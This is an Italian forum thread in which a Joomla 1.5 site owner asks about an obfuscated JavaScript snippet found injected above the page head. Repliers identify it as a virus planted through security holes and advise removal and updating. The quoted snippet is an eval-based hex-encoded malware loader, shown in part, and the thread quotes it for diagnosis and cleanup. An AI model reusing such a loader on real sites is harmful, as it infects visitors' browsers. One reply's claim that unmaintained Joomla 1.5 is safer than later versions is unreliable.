• felino
    Super User

    [Joomla 1.5] Script sopra l'head

    Salve utenti,ho preso in cura un sito web realizzato con Joomla 1.5.

    Appena entro AVG lo blocca! Mi sono accorto che in sopra l'head c'è il seguente codice:

    
 <script>e=eval;v="0"+"x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document["\x62ody"]^=~1;}catch(q){a2="_"}z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_ ... _68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6d_30_42_14_10_10_84"["split"](a2);s="";for(i=0;i<z.length;i++){s+=String["fromCharCode"](e(v+(z*))-5-2);}zaz=s;e(zaz);}</script>

    Credo sia questo il problema vero? Ho scansionato tutti i file ma non l'ho trovato!

    Appena lo rimuovo effettuo l'aggiornamento alla 1.5.26...

    Qualche suggerimento? 😞

    Grazie.

    0
  • F
    User Attivo

    E' un virus che ti è stato iniettato a causa delle numerose falle XSS presenti in Joomla 1.5.

    • Assicurati che i permessi a files e cartelle siano corretti e che non ci siano impostazioni troppo permissive (777, ecc)
    • Rimuovi quello script ovunque sia presente
    • Aggiorna immediatamente Joomla ad una versione sicura
    0
  • felino
    Super User

    Ciao Francesco,
    si infatti, ero uno codice PHP inserito in tutte le index dei template! L'ho rimosso e effettuato l'aggiornamento all'ultima versione, la 1.5.26! Speriamo bene!

    Grazie comunque!

    0
  • F
    User Attivo

    @felino said:

    L'ho rimosso e effettuato l'aggiornamento all'ultima versione, la 1.5.26! Speriamo bene!

    Ma non si può mica dire "Speriamo bene" e poi si incrociano le dita? 😄

    La comunità Joomla ha staccato la spina allo sviluppo della 1.5.x in Aprile 2012... è una versione rischiosa da tenere su siti in produzione, rischi di fare brutte figure.

    0
  • felino
    Super User

    Scherzavo!
    Lo so...dovrei prima testare i vari moduli utilizzati e vedere se sono compatibili con la 2.5...e poi eventualmente procedere ad un upgrade!

    Grazie! 😉

    0
  • N
    User Attivo

    Hola

    Non sono d'accordo con i rischi di Joomla 1.5 che fino adesso é molto piu sicura che qualsiasi verisone posteriore ed inoltre funziona meglio, personalmente non consiglio migrare, la percentuale di riuscita apparente è molto basso e di riuscita totale (ossia senza errori nascosti) nulla, se davvero vuoi migrare consiglio di fare un sito nuovo nella versione superiore ed importare le tabelle migrate.

    A parte questo, Joomla 2.5 è poco stabile e presenta diverse pecche di funzionamento, url sef in testa.

    0
Effettua l'accesso per rispondere